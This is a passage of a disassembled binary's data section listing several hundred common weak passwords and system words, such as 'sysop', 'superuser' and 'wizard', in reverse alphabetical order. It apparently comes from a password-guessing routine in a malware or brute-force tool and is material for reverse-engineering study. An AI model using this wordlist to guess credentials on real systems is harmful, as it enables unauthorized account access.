a00000000 db '00000000',0 ; DATA XREF: ___:0043090C�o
align 4
aZulu db 'zulu',0 ; DATA XREF: ___:00430908�o
align 4
aZombie db 'zombie',0 ; DATA XREF: ___:00430904�o
align 4
aZmodem db 'zmodem',0 ; DATA XREF: ___:00430900�o
align 4
aZimmerma db 'zimmerma',0 ; DATA XREF: ___:004308FC�o
align 10h
aZiggy db 'ziggy',0 ; DATA XREF: ___:004308F8�o
align 4
aZeitgeis db 'zeitgeis',0 ; DATA XREF: ___:004308F4�o
align 4
aZebra db 'zebra',0 ; DATA XREF: ___:004308F0�o
align 4
aYoung db 'young',0 ; DATA XREF: ___:004308EC�o
align 4
aYosemite db 'yosemite',0 ; DATA XREF: ___:004308E8�o
align 10h
aYolanda db 'yolanda',0 ; DATA XREF: ___:004308E4�o
aYellowst db 'yellowst',0 ; DATA XREF: ___:004308E0�o
align 4
aYellow db 'yellow',0 ; DATA XREF: ___:004308DC�o
align 4
aYankee db 'yankee',0 ; DATA XREF: ___:004308D8�o
align 4
aYang db 'yang',0 ; DATA XREF: ___:004308D4�o
align 4
aYaco db 'yaco',0 ; DATA XREF: ___:004308D0�o
align 4
aXyzzy db 'xyzzy',0 ; DATA XREF: ___:004308CC�o
align 4
aXray db 'xray',0 ; DATA XREF: ___:004308C8�o
align 4
aXmodem db 'xmodem',0 ; DATA XREF: ___:004308C4�o
align 4
aXmen db 'xmen',0 ; DATA XREF: ___:004308C0�o
align 4
aXman db 'xman',0 ; DATA XREF: ___:004308BC�o
align 4
aXfer db 'xfer',0 ; DATA XREF: ___:004308B8�o
align 4
aXena db 'xena',0 ; DATA XREF: ___:004308B4�o
align 4
aWyoming db 'wyoming',0 ; DATA XREF: ___:004308B0�o
aWwii db 'wwii',0 ; DATA XREF: ___:004308AC�o
align 4
aWormwood db 'wormwood',0 ; DATA XREF: ___:004308A8�o
align 4
aWorm db 'worm',0 ; DATA XREF: ___:004308A4�o
align 10h
aWork db 'work',0 ; DATA XREF: ___:004308A0�o
align 4
aWorf db 'worf',0 ; DATA XREF: ___:0043089C�o
align 10h
aWordperf db 'wordperf',0 ; DATA XREF: ___:00430898�o
align 4
aWord db 'word',0 ; DATA XREF: ___:00430894�o
align 4
aWoodwind db 'woodwind',0 ; DATA XREF: ___:00430890�o
align 10h
aWood db 'wood',0 ; DATA XREF: ___:0043088C�o
align 4
aWomen db 'women',0 ; DATA XREF: ___:00430888�o
align 10h
aWombat db 'wombat',0 ; DATA XREF: ___:00430884�o
align 4
aWoman db 'woman',0 ; DATA XREF: ___:00430880�o
align 10h
aWolverin db 'wolverin',0 ; DATA XREF: ___:0043087C�o
align 4
aWolf db 'wolf',0 ; DATA XREF: ___:00430878�o
align 4
aWizard db 'wizard',0 ; DATA XREF: ___:00430874�o
align 4
aWithin db 'within',0 ; DATA XREF: ___:00430870�o
align 4
aWiseass db 'wiseass',0 ; DATA XREF: ___:0043086C�o
aWisconsi db 'wisconsi',0 ; DATA XREF: ___:00430868�o
align 4
aWired db 'wired',0 ; DATA XREF: ___:00430864�o
align 10h
aWinston db 'winston',0 ; DATA XREF: ___:00430860�o
aWing db 'wing',0 ; DATA XREF: ___:0043085C�o
align 10h
aWine db 'wine',0 ; DATA XREF: ___:00430858�o
align 4
aWindows db 'windows',0 ; DATA XREF: ___:00430854�o
aWilma db 'wilma',0 ; DATA XREF: ___:00430850�o
align 4
aWillie db 'willie',0 ; DATA XREF: ___:0043084C�o
align 10h
aWilliams db 'williams',0 ; DATA XREF: ___:00430848�o
align 4
aWilliam db 'william',0 ; DATA XREF: ___:00430844�o
aWill db 'will',0 ; DATA XREF: ___:00430840�o
align 4
aWhore db 'whore',0 ; DATA XREF: ___:0043083C�o
align 4
aWholesal db 'wholesal',0 ; DATA XREF: ___:00430838�o
align 10h
aWhitney db 'whitney',0 ; DATA XREF: ___:00430834�o
aWhiting db 'whiting',0 ; DATA XREF: ___:00430830�o
aWhite db 'white',0 ; DATA XREF: ___:0043082C�o
align 4
aWhisky db 'whisky',0 ; DATA XREF: ___:00430828�o
align 10h
aWhatnot db 'whatnot',0 ; DATA XREF: ___:00430824�o
aWhatever db 'whatever',0 ; DATA XREF: ___:00430820�o
align 4
aWestern db 'western',0 ; DATA XREF: ___:0043081C�o
aWest db 'west',0 ; DATA XREF: ___:00430818�o
align 4
aWerewolf db 'werewolf',0 ; DATA XREF: ___:00430814�o
align 10h
aWendy db 'wendy',0 ; DATA XREF: ___:00430810�o
align 4
aWendi db 'wendi',0 ; DATA XREF: ___:0043080C�o
align 10h
aWell db 'well',0 ; DATA XREF: ___:00430808�o
align 4
aWeenie db 'weenie',0 ; DATA XREF: ___:00430804�o
align 10h
aWeed db 'weed',0 ; DATA XREF: ___:00430800�o
align 4
aWednesda db 'wednesda',0 ; DATA XREF: ___:004307FC�o
align 4
aWebpage db 'webpage',0 ; DATA XREF: ___:004307F8�o
aWave db 'wave',0 ; DATA XREF: ___:004307F4�o
align 4
aWater db 'water',0 ; DATA XREF: ___:004307F0�o
align 4
aWatchwor db 'watchwor',0 ; DATA XREF: ___:004307EC�o
align 4
aWasp db 'wasp',0 ; DATA XREF: ___:004307E8�o
align 10h
aWarren db 'warren',0 ; DATA XREF: ___:004307E4�o
align 4
aWarp db 'warp',0 ; DATA XREF: ___:004307E0�o
align 10h
aWargames db 'wargames',0 ; DATA XREF: ___:004307DC�o
align 4
aWarfare db 'warfare',0 ; DATA XREF: ___:004307D8�o
aWarez db 'warez',0 ; DATA XREF: ___:004307D4�o
align 4
aWard db 'ward',0 ; DATA XREF: ___:004307D0�o
align 4
aWaco db 'waco',0 ; DATA XREF: ___:004307CC�o
align 4
aVodka db 'vodka',0 ; DATA XREF: ___:004307C8�o
align 4
aVisualba db 'visualba',0 ; DATA XREF: ___:004307C4�o
align 10h
aVisual db 'visual',0 ; DATA XREF: ___:004307C0�o
align 4
aVisitor db 'visitor',0 ; DATA XREF: ___:004307BC�o
aVirus db 'virus',0 ; DATA XREF: ___:004307B8�o
align 4
aVirginia db 'virginia',0 ; DATA XREF: ___:004307B4�o
align 4
aVirgin db 'virgin',0 ; DATA XREF: ___:004307B0�o
align 4
aVillage db 'village',0 ; DATA XREF: ___:004307AC�o
aVideogam db 'videogam',0 ; DATA XREF: ___:004307A8�o
align 10h
aVideo db 'video',0 ; DATA XREF: sub_40F6F1:loc_413F12�o
; ___:004307A4�o
align 4
aVictor db 'victor',0 ; DATA XREF: ___:004307A0�o
align 10h
aVicky db 'vicky',0 ; DATA XREF: ___:0043079C�o
align 4
aVertigo db 'vertigo',0 ; DATA XREF: ___:00430798�o
aVeronica db 'veronica',0 ; DATA XREF: ___:00430794�o
align 4
aVenus db 'venus',0 ; DATA XREF: ___:00430790�o
align 4
aVasant db 'vasant',0 ; DATA XREF: ___:0043078C�o
align 4
aVampire db 'vampire',0 ; DATA XREF: ___:00430788�o
aValerie db 'valerie',0 ; DATA XREF: ___:00430784�o
aVagina db 'vagina',0 ; DATA XREF: ___:00430780�o
align 4
aUucp db 'uucp',0 ; DATA XREF: ___:0043077C�o
align 4
aUtility db 'utility',0 ; DATA XREF: ___:00430778�o
aUtil db 'util',0 ; DATA XREF: ___:00430774�o
align 4
aUsmc db 'usmc',0 ; DATA XREF: ___:00430770�o
align 4
aUsername db 'username',0 ; DATA XREF: ___:0043076C�o
align 10h
aUsermane db 'usermane',0 ; DATA XREF: ___:00430768�o
align 4
aUsenet db 'usenet',0 ; DATA XREF: ___:00430764�o
align 4
aUrsula db 'ursula',0 ; DATA XREF: ___:00430760�o
align 4
aUrchin db 'urchin',0 ; DATA XREF: ___:0043075C�o
align 4
aUranus db 'uranus',0 ; DATA XREF: ___:00430758�o
align 4
aUpload db 'upload',0 ; DATA XREF: ___:00430754�o
align 4
aUnlock db 'unlock',0 ; DATA XREF: ___:00430750�o
align 4
aUnknown_1 db 'unknown',0 ; DATA XREF: ___:0043074C�o
aUniversi db 'universi',0 ; DATA XREF: ___:00430748�o
align 10h
aUniverse db 'universe',0 ; DATA XREF: ___:00430744�o
align 4
aUniversa db 'universa',0 ; DATA XREF: ___:00430740�o
align 4
aUniform db 'uniform',0 ; DATA XREF: ___:0043073C�o
aUnicorn db 'unicorn',0 ; DATA XREF: ___:00430738�o
aUnhappy db 'unhappy',0 ; DATA XREF: ___:00430734�o
aUndo db 'undo',0 ; DATA XREF: ___:00430730�o
align 4
aUncle db 'uncle',0 ; DATA XREF: ___:0043072C�o
align 10h
aUmesh db 'umesh',0 ; DATA XREF: ___:00430728�o
align 4
aUgly db 'ugly',0 ; DATA XREF: ___:00430724�o
align 10h
aTuttle db 'tuttle',0 ; DATA XREF: ___:00430720�o
align 4
aTurn db 'turn',0 ; DATA XREF: ___:0043071C�o
align 10h
aTuesday db 'tuesday',0 ; DATA XREF: ___:00430718�o
aTubas db 'tubas',0 ; DATA XREF: ___:00430714�o
align 10h
aTruth db 'truth',0 ; DATA XREF: ___:00430710�o
align 4
aTrue db 'true',0 ; DATA XREF: ___:0043070C�o
align 10h
aTron db 'tron',0 ; DATA XREF: ___:00430708�o
align 4
aTrombone db 'trombone',0 ; DATA XREF: ___:00430704�o
align 4
aTrojan db 'trojan',0 ; DATA XREF: ___:00430700�o
align 4
aTrivial db 'trivial',0 ; DATA XREF: ___:004306FC�o
aTrisha db 'trisha',0 ; DATA XREF: ___:004306F8�o
align 4
aTrek db 'trek',0 ; DATA XREF: ___:004306F4�o
align 4
aTree db 'tree',0 ; DATA XREF: ___:004306F0�o
align 4
aTrapdoor db 'trapdoor',0 ; DATA XREF: ___:004306EC�o
align 4
aTrap db 'trap',0 ; DATA XREF: ___:004306E8�o
align 10h
aTransfer db 'transfer',0 ; DATA XREF: ___:004306E4�o
align 4
aTrails db 'trails',0 ; DATA XREF: ___:004306E0�o
align 4
aTracy db 'tracy',0 ; DATA XREF: ___:004306DC�o
align 4
aTracie db 'tracie',0 ; DATA XREF: ___:004306D8�o
align 4
aTraci db 'traci',0 ; DATA XREF: ___:004306D4�o
align 4
aToyota db 'toyota',0 ; DATA XREF: ___:004306D0�o
align 4
aToxic db 'toxic',0 ; DATA XREF: ___:004306CC�o
align 4
aTortoise db 'tortoise',0 ; DATA XREF: ___:004306C8�o
align 4
aTopograp db 'topograp',0 ; DATA XREF: ___:004306C4�o
align 4
aTomato db 'tomato',0 ; DATA XREF: ___:004306C0�o
align 4
aTokenrin db 'tokenrin',0 ; DATA XREF: ___:004306BC�o
align 4
aToken db 'token',0 ; DATA XREF: ___:004306B8�o
align 10h
aToggle db 'toggle',0 ; DATA XREF: ___:004306B4�o
align 4
aToad db 'toad',0 ; DATA XREF: ___:004306B0�o
align 10h
aTits db 'tits',0 ; DATA XREF: ___:004306AC�o
align 4
aTina db 'tina',0 ; DATA XREF: ___:004306A8�o
align 10h
aTime db 'time',0 ; DATA XREF: ___:004306A4�o
align 4
aTiger db 'tiger',0 ; DATA XREF: ___:004306A0�o
align 10h
aTiffany db 'tiffany',0 ; DATA XREF: ___:0043069C�o
aThursday db 'thursday',0 ; DATA XREF: ___:00430698�o
align 4
aThin db 'thin',0 ; DATA XREF: ___:00430694�o
align 4
aTheresa db 'theresa',0 ; DATA XREF: ___:00430690�o
aThailand db 'thailand',0 ; DATA XREF: ___:0043068C�o
align 10h
aText db 'text',0 ; DATA XREF: ___:00430688�o
align 4
aTetris db 'tetris',0 ; DATA XREF: ___:00430684�o
align 10h
aTess db 'tess',0 ; DATA XREF: ___:00430680�o
align 4
aTerminat db 'terminat',0 ; DATA XREF: ___:0043067C�o
align 4
aTerminal db 'terminal',0 ; DATA XREF: ___:00430678�o
align 10h
aTera db 'tera',0 ; DATA XREF: ___:00430674�o
align 4
aTennis db 'tennis',0 ; DATA XREF: ___:00430670�o
align 10h
aTemptati db 'temptati',0 ; DATA XREF: ___:0043066C�o
align 4
aTelnet db 'telnet',0 ; DATA XREF: ___:00430668�o
align 4
aTelephon db 'telephon',0 ; DATA XREF: ___:00430664�o
align 10h
aTeenage db 'teenage',0 ; DATA XREF: ___:00430660�o
aTeen db 'teen',0 ; DATA XREF: ___:0043065C�o
align 10h
aTech db 'tech',0 ; DATA XREF: ___:00430658�o
align 4
aTears db 'tears',0 ; DATA XREF: ___:00430654�o
align 10h
aTeapot db 'teapot',0 ; DATA XREF: ___:00430650�o
align 4
aTeam db 'team',0 ; DATA XREF: ___:0043064C�o
align 10h
aTaylor db 'taylor',0 ; DATA XREF: ___:00430644�o
align 4
aTarragon db 'tarragon',0 ; DATA XREF: ___:00430640�o
align 4
aTarget db 'target',0 ; DATA XREF: ___:0043063C�o
align 4
aTara db 'tara',0 ; DATA XREF: ___:00430638�o
align 4
aTape db 'tape',0 ; DATA XREF: ___:00430634�o
align 4
aTango db 'tango',0 ; DATA XREF: ___:00430630�o
align 4
aTangerin db 'tangerin',0 ; DATA XREF: ___:0043062C�o
align 10h
aTammy db 'tammy',0 ; DATA XREF: ___:00430628�o
align 4
aTamie db 'tamie',0 ; DATA XREF: ___:00430624�o
align 10h
aTami db 'tami',0 ; DATA XREF: ___:00430620�o
align 4
aTamara db 'tamara',0 ; DATA XREF: ___:0043061C�o
align 10h
aTall db 'tall',0 ; DATA XREF: ___:00430618�o
align 4
aTalk db 'talk',0 ; DATA XREF: ___:00430614�o
align 10h
aTabasco db 'tabasco',0 ; DATA XREF: ___:00430610�o
aSysop db 'sysop',0 ; DATA XREF: ___:0043060C�o
align 10h
aSysadmin db 'sysadmin',0 ; DATA XREF: ___:00430608�o
align 4
aSymmetry db 'symmetry',0 ; DATA XREF: ___:00430604�o
align 4
aSybil db 'sybil',0 ; DATA XREF: ___:00430600�o
align 10h
aSword db 'sword',0 ; DATA XREF: ___:004305FC�o
align 4
aSwitch db 'switch',0 ; DATA XREF: ___:004305F8�o
align 10h
aSweat db 'sweat',0 ; DATA XREF: ___:004305F4�o
align 4
aSwearer db 'swearer',0 ; DATA XREF: ___:004305F0�o
aSuzie db 'suzie',0 ; DATA XREF: ___:004305EC�o
align 4
aSuzanne db 'suzanne',0 ; DATA XREF: ___:004305E8�o
aSusie db 'susie',0 ; DATA XREF: ___:004305E4�o
align 4
aSusanne db 'susanne',0 ; DATA XREF: ___:004305E0�o
aSusan db 'susan',0 ; DATA XREF: ___:004305DC�o
align 4
aSurfing db 'surfing',0 ; DATA XREF: ___:004305D8�o
aSurfer db 'surfer',0 ; DATA XREF: ___:004305D4�o
align 4
aSupporte db 'supporte',0 ; DATA XREF: ___:004305D0�o
align 4
aSupport db 'support',0 ; DATA XREF: ___:004305CC�o
aSupervis db 'supervis',0 ; DATA XREF: ___:004305C8�o
align 4
aSuperuse db 'superuse',0 ; DATA XREF: ___:004305C4�o
align 4
aSupersta db 'supersta',0 ; DATA XREF: ___:004305C0�o
align 10h
aSuperson db 'superson',0 ; DATA XREF: ___:004305BC�o
align 4
aSuperman db 'superman',0 ; DATA XREF: ___:004305B8�o
align 4
aSunday db 'sunday',0 ; DATA XREF: ___:004305B4�o
align 10h
aSummer db 'summer',0 ; DATA XREF: ___:004305B0�o
align 4
aSucks db 'sucks',0 ; DATA XREF: ___:004305AC�o
align 10h
aSuckmydi db 'suckmydi',0 ; DATA XREF: ___:004305A8�o
align 4
aSuck db 'suck',0 ; DATA XREF: ___:004305A4�o
align 4
aSuccess db 'success',0 ; DATA XREF: ___:004305A0�o
aSubway db 'subway',0 ; DATA XREF: ___:0043059C�o
align 4
aSubscrib db 'subscrib',0 ; DATA XREF: ___:00430598�o
align 10h
aStuttgar db 'stuttgar',0 ; DATA XREF: ___:00430594�o
align 4
aStrip db 'strip',0 ; DATA XREF: ___:0043058C�o
align 4
aString db 'string',0 ; DATA XREF: ___:00430588�o
align 4
aStreetfi db 'streetfi',0 ; DATA XREF: ___:00430584�o
align 4
aStratfor db 'stratfor',0 ; DATA XREF: ___:00430580�o
align 4
aStrangle db 'strangle',0 ; DATA XREF: ___:0043057C�o
align 10h
aStrange db 'strange',0 ; DATA XREF: ___:00430578�o
aStones db 'stones',0 ; DATA XREF: ___:00430574�o
align 10h
aStoned db 'stoned',0 ; DATA XREF: ___:00430570�o
align 4
aStoneage db 'stoneage',0 ; DATA XREF: ___:0043056C�o
align 4
aSteve db 'steve',0 ; DATA XREF: ___:00430568�o
align 4
aStereo db 'stereo',0 ; DATA XREF: ___:00430564�o
align 4
aStephani db 'stephani',0 ; DATA XREF: ___:00430560�o
align 10h
aSteph db 'steph',0 ; DATA XREF: ___:0043055C�o
align 4
aSteel db 'steel',0 ; DATA XREF: ___:00430558�o
align 10h
aSteal db 'steal',0 ; DATA XREF: ___:00430554�o
align 4
aSteak db 'steak',0 ; DATA XREF: ___:00430550�o
align 10h
aStarwars db 'starwars',0 ; DATA XREF: ___:0043054C�o
align 4
aStartup db 'startup',0 ; DATA XREF: ___:00430548�o
aStartrek db 'startrek',0 ; DATA XREF: ___:00430544�o
align 10h
aStart db 'start',0 ; DATA XREF: sub_40F6F1+2103�o
; ___:00430540�o
align 4
aStarship db 'starship',0 ; DATA XREF: ___:0043053C�o
align 4
aStar db 'star',0 ; DATA XREF: ___:00430538�o
align 4
aStacy db 'stacy',0 ; DATA XREF: ___:00430534�o
align 4
aStacie db 'stacie',0 ; DATA XREF: ___:00430530�o
align 4
aStaci db 'staci',0 ; DATA XREF: ___:0043052C�o
align 4
aStacey db 'stacey',0 ; DATA XREF: ___:00430528�o
align 4
aSr71 db 'sr71',0 ; DATA XREF: ___:00430524�o
align 4
aSquires db 'squires',0 ; DATA XREF: ___:00430520�o
aSpunk db 'spunk',0 ; DATA XREF: ___:0043051C�o
align 4
aSpringer db 'springer',0 ; DATA XREF: ___:00430518�o
align 10h
aSpring db 'spring',0 ; DATA XREF: ___:00430514�o
align 4
aSpred db 'spred',0 ; DATA XREF: ___:00430510�o
align 10h
aSpit db 'spit',0 ; DATA XREF: ___:0043050C�o
align 4
aSpiderma db 'spiderma',0 ; DATA XREF: ___:00430508�o
align 4
aSpider db 'spider',0 ; DATA XREF: ___:00430504�o
align 4
aSpice db 'spice',0 ; DATA XREF: ___:00430500�o
align 4
aSpell db 'spell',0 ; DATA XREF: ___:004304FC�o
align 4
aSpear db 'spear',0 ; DATA XREF: ___:004304F8�o
align 4
aSparrows db 'sparrows',0 ; DATA XREF: ___:004304F4�o
align 10h
aSpaceshi db 'spaceshi',0 ; DATA XREF: ___:004304F0�o
align 4
aSouth db 'south',0 ; DATA XREF: ___:004304EC�o
align 4
aSource db 'source',0 ; DATA XREF: ___:004304E8�o
align 4
aSossina db 'sossina',0 ; DATA XREF: ___:004304E4�o
aSonya db 'sonya',0 ; DATA XREF: ___:004304E0�o
align 4
aSonic db 'sonic',0 ; DATA XREF: ___:004304DC�o
align 4
aSonia db 'sonia',0 ; DATA XREF: ___:004304D8�o
align 4
aSondra db 'sondra',0 ; DATA XREF: ___:004304D4�o
align 4
aSomebody db 'somebody',0 ; DATA XREF: ___:004304D0�o
align 10h
aSoftware db 'software',0 ; DATA XREF: ___:004304CC�o
align 4
aSoft db 'soft',0 ; DATA XREF: ___:004304C8�o
align 4
aSodomy db 'sodomy',0 ; DATA XREF: ___:004304C4�o
align 4
aSocrates db 'socrates',0 ; DATA XREF: ___:004304C0�o
align 4
aSocial db 'social',0 ; DATA XREF: ___:004304BC�o
align 10h
aSoap db 'soap',0 ; DATA XREF: ___:004304B8�o
align 4
aSnoopy db 'snoopy',0 ; DATA XREF: ___:004304B4�o
align 10h
aSnatch db 'snatch',0 ; DATA XREF: ___:004304B0�o
align 4
aSnake db 'snake',0 ; DATA XREF: ___:004304AC�o
align 10h
aSnafu db 'snafu',0 ; DATA XREF: ___:004304A8�o
align 4
aSnach db 'snach',0 ; DATA XREF: ___:004304A4�o
align 10h
aSmut db 'smut',0 ; DATA XREF: ___:004304A0�o
align 4
aSmtp db 'smtp',0 ; DATA XREF: ___:0043049C�o
align 10h
aSmother db 'smother',0 ; DATA XREF: ___:00430498�o
aSmooch db 'smooch',0 ; DATA XREF: ___:00430494�o
align 10h
aSmiles db 'smiles',0 ; DATA XREF: ___:00430490�o
align 4
aSmile db 'smile',0 ; DATA XREF: ___:0043048C�o
align 10h
aSmart db 'smart',0 ; DATA XREF: ___:00430488�o
align 4
aSmall db 'small',0 ; DATA XREF: ___:00430484�o
align 10h
aSlut db 'slut',0 ; DATA XREF: ___:00430480�o
align 4
aSlow db 'slow',0 ; DATA XREF: ___:0043047C�o
align 10h
aSliders db 'sliders',0 ; DATA XREF: ___:00430478�o
aSlick db 'slick',0 ; DATA XREF: ___:00430474�o
align 10h
aSlave db 'slave',0 ; DATA XREF: ___:00430470�o
align 4
aSkull db 'skull',0 ; DATA XREF: ___:0043046C�o
align 10h
aSite db 'site',0 ; DATA XREF: ___:00430468�o
align 4
aSingle db 'single',0 ; DATA XREF: ___:00430464�o
align 10h
aSinger db 'singer',0 ; DATA XREF: ___:00430460�o
align 4
aSimulati db 'simulati',0 ; DATA XREF: ___:0043045C�o
align 4
aSimpsons db 'simpsons',0 ; DATA XREF: ___:00430458�o
align 10h
aSimple db 'simple',0 ; DATA XREF: ___:00430454�o
align 4
aSimon db 'simon',0 ; DATA XREF: ___:00430450�o
align 10h
aSimcity db 'simcity',0 ; DATA XREF: ___:0043044C�o
aSilver db 'silver',0 ; DATA XREF: ___:00430448�o
align 10h
aSignatur db 'signatur',0 ; DATA XREF: ___:00430444�o
align 4
aSierra db 'sierra',0 ; DATA XREF: ___:00430440�o
align 4
aSick db 'sick',0 ; DATA XREF: ___:0043043C�o
align 4
aShuttle db 'shuttle',0 ; DATA XREF: ___:00430438�o
aShort db 'short',0 ; DATA XREF: ___:00430434�o
align 4
aShivers db 'shivers',0 ; DATA XREF: ___:00430430�o
aShiva db 'shiva',0 ; DATA XREF: ___:0043042C�o
align 4
aShitpot db 'shitpot',0 ; DATA XREF: ___:00430428�o
aShit db 'shit',0 ; DATA XREF: ___:00430424�o
align 4
aShirley db 'shirley',0 ; DATA XREF: ___:00430420�o
aShift db 'shift',0 ; DATA XREF: ___:0043041C�o
align 4
aSherri db 'sherri',0 ; DATA XREF: ___:00430418�o
align 4
aShell db 'shell',0 ; DATA XREF: ___:00430414�o
align 4
aSheldon db 'sheldon',0 ; DATA XREF: ___:00430410�o
aSheffiel db 'sheffiel',0 ; DATA XREF: ___:0043040C�o
align 10h
aSharon db 'sharon',0 ; DATA XREF: ___:00430408�o
align 4
aSharks db 'sharks',0 ; DATA XREF: ___:00430404�o
align 10h
aShark db 'shark',0 ; DATA XREF: ___:00430400�o
align 4
aSharc db 'sharc',0 ; DATA XREF: ___:004303FC�o
align 10h
aShannon db 'shannon',0 ; DATA XREF: ___:004303F8�o
aSexy db 'sexy',0 ; DATA XREF: ___:004303F4�o
align 10h
aSesame db 'sesame',0 ; DATA XREF: ___:004303F0�o
align 4
aService db 'service',0 ; DATA XREF: ___:004303EC�o
aSerial_0 db 'serial',0 ; DATA XREF: ___:004303E8�o
align 4
aSerenity db 'serenity',0 ; DATA XREF: ___:004303E4�o
align 4
aSentry db 'sentry',0 ; DATA XREF: ___:004303E0�o
align 4
aSentinel db 'sentinel',0 ; DATA XREF: ___:004303DC�o
align 4
aSensor db 'sensor',0 ; DATA XREF: ___:004303D8�o
align 10h
aSega db 'sega',0 ; DATA XREF: ___:004303D4�o
align 4
aSeed db 'seed',0 ; DATA XREF: ___:004303D0�o
align 10h
aSecurity db 'security',0 ; DATA XREF: ___:004303CC�o
align 4
aSearch db 'search',0 ; DATA XREF: ___:004303C8�o
align 4
aScout db 'scout',0 ; DATA XREF: ___:004303C4�o
align 4
aScotty db 'scotty',0 ; DATA XREF: ___:004303C0�o
align 4
aScott db 'scott',0 ; DATA XREF: ___:004303BC�o
align 4
aScorpion db 'scorpion',0 ; DATA XREF: ___:004303B8�o
align 4
aScifi db 'scifi',0 ; DATA XREF: ___:004303B4�o
align 10h
aSchoolsucks db 'schoolsucks',0 ; DATA XREF: ___:004303B0�o
aSchool db 'school',0 ; DATA XREF: ___:004303AC�o
align 4
aScheme db 'scheme',0 ; DATA XREF: ___:004303A8�o
align 4
aScamper db 'scamper',0 ; DATA XREF: ___:004303A4�o
aSaxon db 'saxon',0 ; DATA XREF: ___:004303A0�o
align 4
aSaturn db 'saturn',0 ; DATA XREF: ___:0043039C�o
align 4
aSaturday db 'saturday',0 ; DATA XREF: ___:00430398�o
align 10h
aSarah db 'sarah',0 ; DATA XREF: ___:00430394�o
align 4
aSara db 'sara',0 ; DATA XREF: ___:00430390�o
align 10h
aSandy db 'sandy',0 ; DATA XREF: ___:0043038C�o
align 4
aSandra db 'sandra',0 ; DATA XREF: ___:00430388�o
align 10h
aSample db 'sample',0 ; DATA XREF: ___:00430384�o
align 4
aSamantha db 'samantha',0 ; DATA XREF: ___:00430380�o
align 4
aSalt db 'salt',0 ; DATA XREF: ___:0043037C�o
align 4
aSale db 'sale',0 ; DATA XREF: ___:00430378�o
align 4
aSalami db 'salami',0 ; DATA XREF: ___:00430374�o
align 4
aSafe db 'safe',0 ; DATA XREF: ___:00430370�o
align 4
aRuth db 'ruth',0 ; DATA XREF: ___:0043036C�o
align 4
aRush db 'rush',0 ; DATA XREF: ___:00430368�o
align 4
aRunning_0 db 'running',0 ; DATA XREF: ___:00430364�o
aRules db 'rules',0 ; DATA XREF: ___:00430360�o
align 4
aRude db 'rude',0 ; DATA XREF: ___:0043035C�o
align 4
aRuby db 'ruby',0 ; DATA XREF: ___:00430358�o
align 4
aRuben db 'ruben',0 ; DATA XREF: ___:00430354�o
align 4
aRubber db 'rubber',0 ; DATA XREF: ___:00430350�o
align 4
aRough db 'rough',0 ; DATA XREF: ___:0043034C�o
align 4
aRoses db 'roses',0 ; DATA XREF: ___:00430348�o
align 4
aRosemary db 'rosemary',0 ; DATA XREF: ___:00430344�o
align 10h
aRosebud db 'rosebud',0 ; DATA XREF: ___:00430340�o
aRose db 'rose',0 ; DATA XREF: ___:0043033C�o
align 10h
aRonald db 'ronald',0 ; DATA XREF: ___:00430338�o
align 4
aRomulan db 'romulan',0 ; DATA XREF: ___:00430334�o
aRomeo db 'romeo',0 ; DATA XREF: ___:00430330�o
align 4
aRomano db 'romano',0 ; DATA XREF: ___:0043032C�o
align 10h
aRolex db 'rolex',0 ; DATA XREF: ___:00430328�o
align 4
aRodent db 'rodent',0 ; DATA XREF: ___:00430324�o
align 10h
aRockyhor db 'rockyhor',0 ; DATA XREF: ___:00430320�o
align 4
aRocky db 'rocky',0 ; DATA XREF: ___:0043031C�o
align 4
aRock db 'rock',0 ; DATA XREF: ___:00430318�o
align 4
aRocheste db 'rocheste',0 ; DATA XREF: ___:00430314�o
align 4
aRochelle db 'rochelle',0 ; DATA XREF: ___:00430310�o
align 4
aRobyn db 'robyn',0 ; DATA XREF: ___:0043030C�o
align 4
aRobotics db 'robotics',0 ; DATA XREF: ___:00430308�o
align 4
aRobot db 'robot',0 ; DATA XREF: ___:00430304�o
align 10h
aRobin db 'robin',0 ; DATA XREF: ___:00430300�o
align 4
aRobert db 'robert',0 ; DATA XREF: ___:004302FC�o
align 10h
aRoach db 'roach',0 ; DATA XREF: ___:004302F8�o
align 4
aRisc db 'risc',0 ; DATA XREF: ___:004302F4�o
align 10h
aRipple db 'ripple',0 ; DATA XREF: ___:004302F0�o
align 4
aRiot db 'riot',0 ; DATA XREF: ___:004302EC�o
align 10h
aRing db 'ring',0 ; DATA XREF: ___:004302E8�o
align 4
aRightwin db 'rightwin',0 ; DATA XREF: ___:004302E4�o
align 4
aRight db 'right',0 ; DATA XREF: ___:004302E0�o
align 4
aRiffraff db 'riffraff',0 ; DATA XREF: ___:004302DC�o
align 4
aRick db 'rick',0 ; DATA XREF: ___:004302D8�o
align 10h
aRich db 'rich',0 ; DATA XREF: ___:004302D4�o
align 4
aRhino db 'rhino',0 ; DATA XREF: ___:004302D0�o
align 10h
aReveal db 'reveal',0 ; DATA XREF: ___:004302CC�o
align 4
aResistan db 'resistan',0 ; DATA XREF: ___:004302C8�o
align 4
aRepublic db 'republic',0 ; DATA XREF: ___:004302C4�o
align 10h
aReport db 'report',0 ; DATA XREF: ___:004302C0�o
align 4
aRent db 'rent',0 ; DATA XREF: ___:004302BC�o
align 10h
aReno db 'reno',0 ; DATA XREF: ___:004302B8�o
align 4
aRenee db 'renee',0 ; DATA XREF: ___:004302B4�o
align 10h
aRemote db 'remote',0 ; DATA XREF: ___:004302B0�o
align 4
aRelease db 'release',0 ; DATA XREF: ___:004302AC�o
aRegional db 'regional',0 ; DATA XREF: ___:004302A8�o
align 4
aReferenc db 'referenc',0 ; DATA XREF: ___:004302A4�o
align 4
aRedhead db 'redhead',0 ; DATA XREF: ___:004302A0�o
aReddawn db 'reddawn',0 ; DATA XREF: ___:0043029C�o
aRecord db 'record',0 ; DATA XREF: ___:00430298�o
align 10h
aRebel db 'rebel',0 ; DATA XREF: ___:00430294�o
align 4
aRebecca db 'rebecca',0 ; DATA XREF: ___:00430290�o
aRebal db 'rebal',0 ; DATA XREF: ___:0043028C�o
align 4
aReaper db 'reaper',0 ; DATA XREF: ___:00430288�o
align 10h
aReam db 'ream',0 ; DATA XREF: ___:00430284�o
align 4
aReally db 'really',0 ; DATA XREF: ___:00430280�o
align 10h
aReality db 'reality',0 ; DATA XREF: ___:0043027C�o
aReagan db 'reagan',0 ; DATA XREF: ___:00430278�o
align 10h
aRazor db 'razor',0 ; DATA XREF: ___:00430274�o
align 4
aRascal db 'rascal',0 ; DATA XREF: ___:00430270�o
align 10h
aRape db 'rape',0 ; DATA XREF: ___:0043026C�o
align 4
aRaleigh db 'raleigh',0 ; DATA XREF: ___:00430264�o
aRaindrop db 'raindrop',0 ; DATA XREF: ___:00430260�o
align 4
